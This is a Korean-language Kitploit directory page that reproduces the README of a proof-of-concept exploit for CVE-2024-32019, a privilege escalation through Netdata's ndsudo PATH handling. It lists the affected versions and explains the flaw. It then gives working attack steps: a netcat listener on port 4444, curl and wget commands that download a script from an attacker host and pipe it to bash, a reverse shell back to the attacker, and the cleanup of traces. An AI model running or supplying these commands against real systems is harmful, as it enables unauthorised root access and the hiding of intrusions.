Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-32019-PoC — Bash 스크립트: "ndsudo"를 통한 권한 상승 (Netdata 로컬 익스플로잇) | Kitploit
도구/GitHubGitHub/80ottanta80/cve-2024-32019-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationLabs & Practice
GitHub80ottanta80/cve-2024-32019-poc

CVE-2024-32019-PoC

Bash 스크립트: "ndsudo"를 통한 권한 상승 (Netdata 로컬 익스플로잇)

저장소 보기
110개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-32019-PoC

"ndsudo"를 통한 권한 상승을 위한 Bash 스크립트 (Netdata 로컬 익스플로잇)

영향을 받는 Netdata 버전

  • >= v1.45.0, < v1.45.3

  • >= v1.44.0-60, < v1.45.0-169

취약점 설명

"ndsudo" 도구는 제한된 외부 명령어 집합을 실행하지만, 검색 경로는 "PATH" 환경 변수에 의해 제공됩니다. "PATH" 환경 변수를 우리가 접근 가능한 경로로 변경함으로써, ndsudo가 명령어를 찾는 위치를 제어하고 악성 코드를 포함한 명령어를 생성할 수 있습니다.

개념 증명 (Proof of Concept)

이 익스플로잇은 대상 머신과 공격자 머신이 동일한 네트워크에 있다는 가정에 기반합니다.

사전 요구 사항

공격자 머신

  • 포트 4444에서 리스너 실행
  • 악성 nvme 바이너리를 호스팅하는 웹 서버

대상 머신:

  • 로컬 셸 접근 권한
  • ndsudo 실행 권한
  • 페이로드 다운로드를 위한 wget/curl/모든 HTTP 클라이언트

사용법

공격자 머신에서

"setup_exploit_server.sh"를 실행하여 공격에 필요한 파일을 자동으로 생성하고 배포할 수 있습니다.

root@kitploit:~
$ ./setup_exploit_server.sh YOUR_IP

--------- Exploit Infrastructure Setup by Ottanta ---------

[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444

Press Enter to stop the web server and clean up...

이 스크립트는 공격에 필요한 모든 파일을 귀하의 IP 주소로 구성하여 생성합니다.

웹 서버를 배포한 후, 다른 셸에서 리스너를 시작합니다:

root@kitploit:~
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...

대상 머신에서

HTTP 클라이언트에 따라 익스플로잇을 다운로드하고 실행할 수 있습니다.

root@kitploit:~
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP

# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP

모든 것이 올바르게 수행되었다면, 이제 루트 셸을 얻을 수 있습니다.

alt text

익스플로잇 흐름

  1. 악성 바이너리를 /tmp/exploit/에 다운로드
  2. PATH를 수정하여 제어된 디렉터리를 우선시
  3. ndsudo nvme-list를 실행하여 악성 바이너리 실행
  4. 공격자 머신으로 리버스 셸 설정
  5. 흔적 정리

참고 자료

  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
  • https://nvd.nist.gov/vuln/detail/CVE-2024-32019

법적 고지

이 개념 증명은 교육 및 승인된 테스트 목적으로만 제공됩니다. 귀하가 소유하지 않거나 명시적 테스트 권한이 없는 시스템에 대한 무단 사용은 불법입니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다.

도구 다운로드